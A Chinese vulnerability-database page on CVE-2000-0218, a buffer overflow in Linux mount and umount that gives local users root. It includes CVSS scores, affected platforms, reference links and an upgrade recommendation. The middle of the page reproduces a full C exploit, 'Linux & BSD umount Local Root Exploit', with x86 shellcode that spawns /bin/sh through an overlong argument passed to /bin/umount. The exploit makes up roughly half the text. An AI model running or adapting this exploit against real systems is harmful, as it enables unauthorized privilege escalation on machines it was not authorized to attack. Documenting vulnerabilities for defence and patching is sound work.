CVE-2000-0218
CVSS7.2
发布时间 :2000-02-03 00:00:00
修订时间 :2008-09-10 15:03:19
NMCOE    

[原文]Buffer overflow in Linux mount and umount allows local users to gain root privileges via a long relative pathname.


[CNNVD]Linux权限提升漏洞(CNNVD-200002-028)

        Linux安装和卸载中存在缓冲区溢出漏洞。本地用户借助超长相关路径名可以提升根特权。

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:caldera:openlinux:2.3
cpe:/o:suse:suse_linuxSuSE SuSE Linux

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0218
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0218
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200002-028
(官方数据源) CNNVD

- 其它链接及资源

http://www.osvdb.org/7004
(UNKNOWN)  OSVDB  7004
http://www.osvdb.org/6980
(UNKNOWN)  OSVDB  6980
ftp://ftp.caldera.com/pub/security/OpenLinux/CSSA-2000-002.0.txt
(UNKNOWN)  CALDERA  CSSA-2000-002.0

- 漏洞信息

Linux权限提升漏洞
高危 缓冲区溢出
2000-02-03 00:00:00 2005-05-02 00:00:00
本地  
        Linux安装和卸载中存在缓冲区溢出漏洞。本地用户借助超长相关路径名可以提升根特权。

- 公告与补丁

        

- 漏洞信息 (321)

Linux & BSD umount Local Root Exploit (EDBID:321)
multiple local
1996-08-13 Verified
0 bloodmask
N/A [点击下载]
/* Reminder - Be sure to fix the includes /str0ke */
-------------------------------------- linux_umount_exploit.c ----------
#include 
#include 
#include 
#include 
#include 
#include 

#define PATH_MOUNT "/bin/umount"
#define BUFFER_SIZE 1024
#define DEFAULT_OFFSET 50

u_long get_esp()
{
  __asm__("movl %esp, %eax");

}

main(int argc, char **argv)
{
  u_char execshell[] =
   "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
   "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
   "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";

   char *buff = NULL;
   unsigned long *addr_ptr = NULL;
   char *ptr = NULL;

   int i;
   int ofs = DEFAULT_OFFSET;

   buff = malloc(4096);
   if(!buff)
   {
      printf("can't allocate memory\n");
      exit(0);
   }
   ptr = buff;

   /* fill start of buffer with nops */

   memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));
   ptr += BUFFER_SIZE-strlen(execshell);

   /* stick asm code into the buffer */

   for(i=0;i < strlen(execshell);i++)
      *(ptr++) = execshell[i];

   addr_ptr = (long *)ptr;
   for(i=0;i < (8/4);i++)
      *(addr_ptr++) = get_esp() + ofs;
   ptr = (char *)addr_ptr;
   *ptr = 0;

   (void)alarm((u_int)0);
   execl(PATH_MOUNT, "umount", buff, NULL);
}


// milw0rm.com [1996-08-13]
		

- 漏洞信息

6980
Linux mount Long Relative Path Overflow
Local Access Required Input Manipulation
Loss of Integrity
Exploit Unknown

- 漏洞描述

A local overflow exists in some Linux distributions. The mount command fails to validate arguments resulting in a buffer overflow. With a specially crafted request, an attacker can cause arbitrary code execution resulting in a loss of integrity.

- 时间线

2000-02-03 Unknow
Unknow Unknow

- 解决方案

Upgrade to version indicated in vendor advisory or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站